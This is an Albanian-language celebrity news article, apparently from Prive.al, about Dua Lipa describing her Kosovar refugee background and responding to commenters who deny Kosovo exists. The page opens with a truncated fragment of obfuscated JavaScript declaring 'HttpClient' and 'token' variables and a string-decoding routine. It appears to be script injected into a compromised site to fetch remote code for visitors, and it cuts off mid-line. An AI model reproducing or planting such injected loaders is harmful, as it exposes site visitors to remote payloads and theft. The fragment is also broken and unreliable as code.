;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

“Më thonë që nuk kam shtet, Kosova nuk ekziston”, Dua Lipa reagon për ata që i cenojnë identitetin

By

Së fundmi, Dua Lipa ka folur për revistën ËSJ. Magazine duke na treguar shumë gjëra të pathëna nga jeta e saj.

Padyshim që intervista nuk shkoi pa diskutuar edhe prejardhjen e saj shqiptare dhe jetën e saj si refugjate në Mbretërinë e Bashkuar.

Këngëtarja tha se kujtimi i së kaluarës e ndihmon atë të jetë e bazuar dhe e kënaqur me jetën e saj.

“Është një pjesë shumë e madhe e asaj që jam. Duke pasur parasysh prindërit e mi dhe mënyrën se si ata erdhën në Mbretërinë e Bashkuar, [situata e refugjatëve] ka qenë gjithmonë diçka afër zemrës sime,” shtoi ajo.

“Kam lexuar shumë komente nga njerëzit që më thonë se nuk kam shtet, nuk kam identitet, Kosova nuk ekziston. Kam jetuar në Kosovë, i di jetët që kanë humbur. Kështu që kur dikush mundohet të më mohojë identitetin dhe përvojën time, është e vështirë për mua të qëndroj prapa dhe të mos flas për të. Kështu që kjo është diçka që do ta bëj gjithmonë.” ka deklaruar këngëtarja. /Prive.al

Artikuj të ngjashëm